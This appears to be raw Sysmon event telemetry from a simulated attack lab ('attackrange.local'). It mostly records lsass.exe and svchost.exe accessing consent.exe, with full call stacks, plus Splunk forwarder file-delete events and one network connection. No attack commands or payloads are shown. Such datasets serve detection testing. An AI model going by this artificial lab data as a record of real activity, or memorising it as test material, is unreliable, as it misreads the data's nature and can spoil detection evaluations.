08:00:37.419{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052097Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.419{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052096Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.419{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052095Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.419{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052094Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.419{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052093Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.419{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052092Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.419{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052091Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.419{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052090Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.419{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052089Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.419{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052088Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.419{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052087Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.419{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052086Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.419{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052085Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.319{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052084Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.319{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052083Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.319{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052082Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.319{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052081Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.234{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41FEB34E6829F5BEF2097CD913A83DD5,SHA256=2B61B3ED5D1D2CC8EB4630AC9BD69DFCE5430470A753107B0C2DEE94A215544F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052080Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.203{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052079Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.203{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052078Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:37.203{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000809106Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:38.496{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00C4C936763BBA5A67F8E851B94B4797,SHA256=2A76A79B8A836CC378E56B70940E69680EB383EBCD3CEA12159187FA2ED4C02B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052120Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:38.600{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=FA325AA7559A6C92DF2E04BCC9134735,SHA256=13C357B5F9150C39D21FB1153F5BC5B5190AD14B31B812DC20A41D05FF50CD30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052119Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:38.398{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=745F33FD66B59F97756BC7A8C2BDF4CE,SHA256=12944E762F51C6F53ECDC1B3F34CF853ECE008C8040EB714C7B18F20DA6B7EA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809107Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:39.496{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECC5F4D9A4B848B00BB4AEDAAEE8527F,SHA256=FC6491B1F53056EE750A4D67BFAB86C8B33441F4166DEE199A748EEF497FFF12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052121Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:39.401{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A194D3B15DBB04A7DCBF78EA5751B241,SHA256=C28F6532C4DE957601AA130BB30B327EC014D7EB3F2940D15975DADEF13B98E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809109Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:40.511{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8ABA084010C989A149F65DD3ABA9BBE2,SHA256=CE302C3E0F4BC9AF3653131288B138F2914F7DE850918D929F8CEB269E42BF74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052122Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:40.417{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=899B1176AFB7A43594EF3B807096710E,SHA256=DC8027D96372C8A560D1892B203FDA99B926EF25F3CC886AC5925D2AA870D78E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809108Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:38.284{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57372-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001052123Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:41.448{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B2A07E280C6830012C02238F9A2074E,SHA256=BE546F41F9C6C9DCDB2CDAB3E74EE5089F13AECC0228E5B82D5643AABE6C8893,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809110Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:41.511{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 